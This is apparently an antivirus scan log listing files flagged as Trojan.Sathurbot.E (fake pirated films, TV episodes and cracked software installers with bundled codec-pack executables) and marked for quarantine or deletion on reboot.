Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d1eb47beb4f311fd481d357ab3456b07\Collateral Beauty 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d1eb47beb4f311fd481d357ab3456b07\Collateral Beauty 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d1eb47beb4f311fd481d357ab3456b07\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d2bed49e2a2d86016d8993a01ab552d5\The Walking Dead [SE06].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d2bed49e2a2d86016d8993a01ab552d5\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d2bed49e2a2d86016d8993a01ab552d5\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6794318076f8df2ddbbdd4ff7927f10a\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6794318076f8df2ddbbdd4ff7927f10a\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6794318076f8df2ddbbdd4ff7927f10a\Vikings [SE04].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\67dedcd9029bac22b3f63083e26a814f\Rules Dont Apply 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\67dedcd9029bac22b3f63083e26a814f\Rules Dont Apply 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\67dedcd9029bac22b3f63083e26a814f\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\681d1c56fefdf5064964d65ffe5a6be3\Smurfs The Lost Village Rmn 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\681d1c56fefdf5064964d65ffe5a6be3\Smurfs The Lost Village Rmn 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\681d1c56fefdf5064964d65ffe5a6be3\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\682b108f4d7b74c1ad51b38ce08dcd5e\Pride And Prejudice And Zombies 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\682b108f4d7b74c1ad51b38ce08dcd5e\Pride And Prejudice And Zombies 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\682b108f4d7b74c1ad51b38ce08dcd5e\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\691fcacc02bc1047e58a2e80d2739b75\Game of Thrones [SE06].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\691fcacc02bc1047e58a2e80d2739b75\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\691fcacc02bc1047e58a2e80d2739b75\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\696acdc18471bad4e7424cb0996099cc\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\696acdc18471bad4e7424cb0996099cc\Under sandet 2015.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\696acdc18471bad4e7424cb0996099cc\Under sandet 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\69e3c3a6e946adc33bfe8c0e961954a2\Pinnacle Studio Ultimate 19.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\69e3c3a6e946adc33bfe8c0e961954a2\Pinnacle Studio Ultimate 19.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\69e3c3a6e946adc33bfe8c0e961954a2\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a261f1464cdce0b33f8f4ecd1d1ddd4\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a261f1464cdce0b33f8f4ecd1d1ddd4\SolidWorks 2016 SP1.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a261f1464cdce0b33f8f4ecd1d1ddd4\SolidWorks 2016 SP1.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a3c00af9c87188194351bfb60e888a9\Microsoft Project 2016.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a3c00af9c87188194351bfb60e888a9\Microsoft Project 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a3c00af9c87188194351bfb60e888a9\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a50c4bc3eadcd483eedf1b30935e613\I Am Not Madame Bovary 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a50c4bc3eadcd483eedf1b30935e613\I Am Not Madame Bovary 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6a50c4bc3eadcd483eedf1b30935e613\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6c5cb2fc9f84db9de134598a02912f6e\The Godfather 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6c5cb2fc9f84db9de134598a02912f6e\The Godfather 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6c5cb2fc9f84db9de134598a02912f6e\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6cf1a4221dc6831c0b264d2888c75720\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6cf1a4221dc6831c0b264d2888c75720\Yu Gi Oh 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6cf1a4221dc6831c0b264d2888c75720\Yu Gi Oh 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6d6351fb46b5fe461f13a94f6cb339ea\Boyka Undisputed 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6d6351fb46b5fe461f13a94f6cb339ea\Boyka Undisputed 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6d6351fb46b5fe461f13a94f6cb339ea\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6dbdd2e5f83e8cca4603bb59843899d5\Network Inventory Advisor 4.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6dbdd2e5f83e8cca4603bb59843899d5\Network Inventory Advisor 4.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6e994f8d30ada5c4aed6d24b44b537ca\Trainspotting 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6e994f8d30ada5c4aed6d24b44b537ca\Trainspotting 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\6e994f8d30ada5c4aed6d24b44b537ca\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\74b666ebf6a455763d405af8b4d798a7\CorelDRAW Graphics Suite X8.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\74b666ebf6a455763d405af8b4d798a7\CorelDRAW Graphics Suite X8.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\74b666ebf6a455763d405af8b4d798a7\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3c1422ca03ba9542755cb7e8fd271330\Rise of Nations Thrones and Patriots.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3c1422ca03ba9542755cb7e8fd271330\Rise of Nations Thrones and Patriots.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3c1422ca03ba9542755cb7e8fd271330\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3c9e79246325a3d103cd13657e07eb39\Lost Sea 2016.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3c9e79246325a3d103cd13657e07eb39\Lost Sea 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3c9e79246325a3d103cd13657e07eb39\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3cd8f1ad7174b0259114330ea573eb2c\Shin Godzilla 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3cd8f1ad7174b0259114330ea573eb2c\Shin Godzilla 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3cd8f1ad7174b0259114330ea573eb2c\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3fd3c85733e1d00b4a694b5d187b6474\Eye in the Sky 2015.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3fd3c85733e1d00b4a694b5d187b6474\Eye in the Sky 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3fd3c85733e1d00b4a694b5d187b6474\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\423156f65de615cf4d01c2c42eb03db1\Mom [SE03].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\423156f65de615cf4d01c2c42eb03db1\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\423156f65de615cf4d01c2c42eb03db1\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\437b623652da5458a6c67b00c53868f5\Bastards 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\437b623652da5458a6c67b00c53868f5\Bastards 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\437b623652da5458a6c67b00c53868f5\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\44c20a4c35790e24de6161561fdbb077\Boss Baby Rmn 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\44c20a4c35790e24de6161561fdbb077\Boss Baby Rmn 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\44c20a4c35790e24de6161561fdbb077\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4678b4edab6ca6b6701cf31cf9568704\MICROSOFT Office PRO Plus 2016.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4678b4edab6ca6b6701cf31cf9568704\MICROSOFT Office PRO Plus 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\4678b4edab6ca6b6701cf31cf9568704\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\46d4977b73223dab65141204322efc51\Nero Burning Rom 2016.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\46d4977b73223dab65141204322efc51\Nero Burning Rom 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\46d4977b73223dab65141204322efc51\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ed39a6eb8cb42d567573ebdb6ca27c61\Oxford Complete ATPL Study Pack CBT.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ed39a6eb8cb42d567573ebdb6ca27c61\Oxford Complete ATPL Study Pack CBT.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ed39a6eb8cb42d567573ebdb6ca27c61\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f132b912ea3f8097762b256293a9953a\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f132b912ea3f8097762b256293a9953a\Underworld Blood Wars 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f132b912ea3f8097762b256293a9953a\Underworld Blood Wars 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f35e906c7e6c3b68f0285005195eec52\Buddies In India 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f35e906c7e6c3b68f0285005195eec52\Buddies In India 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f35e906c7e6c3b68f0285005195eec52\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f751683de03ade9e0920b62cc8542e6e\Nero 2016 Platinum.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f751683de03ade9e0920b62cc8542e6e\Nero 2016 Platinum.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f751683de03ade9e0920b62cc8542e6e\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f7bcab5dace78283b9f759005152de8d\Age of Empires II HD.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f7bcab5dace78283b9f759005152de8d\Age of Empires II HD.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f7bcab5dace78283b9f759005152de8d\Setup1.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f7bcab5dace78283b9f759005152de8d\Setup2.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f86dbdd379fae926a612a144d5ecce69\Mothers Day 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f86dbdd379fae926a612a144d5ecce69\Mothers Day 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f86dbdd379fae926a612a144d5ecce69\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f97beeb0ed48210ef8858bff00bb7d18\Assassins Creed Revelations Gold Edition.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f97beeb0ed48210ef8858bff00bb7d18\Assassins Creed Revelations Gold Edition.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f97beeb0ed48210ef8858bff00bb7d18\Setup1.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f97beeb0ed48210ef8858bff00bb7d18\Setup2.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f9b5675e6579d5e98b41312ae6345199\The Trust 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f9b5675e6579d5e98b41312ae6345199\The Trust 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\f9b5675e6579d5e98b41312ae6345199\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fa22a82b1df7b08df25803806bd9694f\Arrival 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fa22a82b1df7b08df25803806bd9694f\Arrival 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fa22a82b1df7b08df25803806bd9694f\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\faaee814b82c2a36f06e40af075cb5c1\Never Back Down No Surrender 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\faaee814b82c2a36f06e40af075cb5c1\Never Back Down No Surrender 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\faaee814b82c2a36f06e40af075cb5c1\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fc7160b2565bdcc8382fa74e43495799\Iru Mugan 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fc7160b2565bdcc8382fa74e43495799\Iru Mugan 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fc7160b2565bdcc8382fa74e43495799\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fd2c8238c0e8ea5bd3ea58d9470224f5\A Kind of Murder 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fd2c8238c0e8ea5bd3ea58d9470224f5\A Kind of Murder 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fd2c8238c0e8ea5bd3ea58d9470224f5\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fe75751f0e65f636df55620338ed3cd1\Steve Jobs 2015.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fe75751f0e65f636df55620338ed3cd1\Steve Jobs 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fe75751f0e65f636df55620338ed3cd1\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fe9fbb1ce8e35f5400c89d9ce9f5db14\Big Bang Made The Movie 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fe9fbb1ce8e35f5400c89d9ce9f5db14\Big Bang Made The Movie 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fe9fbb1ce8e35f5400c89d9ce9f5db14\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fefdd2265913197c649c88a119955d59\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fefdd2265913197c649c88a119955d59\Spectrasonics Keyscape.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\fefdd2265913197c649c88a119955d59\Spectrasonics Keyscape.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\941762a0c5862a72a0aa2c1995d754f8\The Autopsy of Jane Doe 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\941762a0c5862a72a0aa2c1995d754f8\The Autopsy of Jane Doe 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\941762a0c5862a72a0aa2c1995d754f8\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\95c9e8535d09b813fef20e7d0a371b31\Almost Christmas 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\95c9e8535d09b813fef20e7d0a371b31\Almost Christmas 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\95c9e8535d09b813fef20e7d0a371b31\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\95e95d42d69637efd05a05d594525553\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\95e95d42d69637efd05a05d594525553\Waves Complete V9.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\95e95d42d69637efd05a05d594525553\Waves Complete V9.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
